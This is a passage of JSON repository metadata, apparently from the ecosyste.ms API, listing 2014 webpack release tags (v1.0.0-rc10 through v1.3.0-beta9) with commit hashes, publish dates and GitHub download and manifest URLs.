pack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07: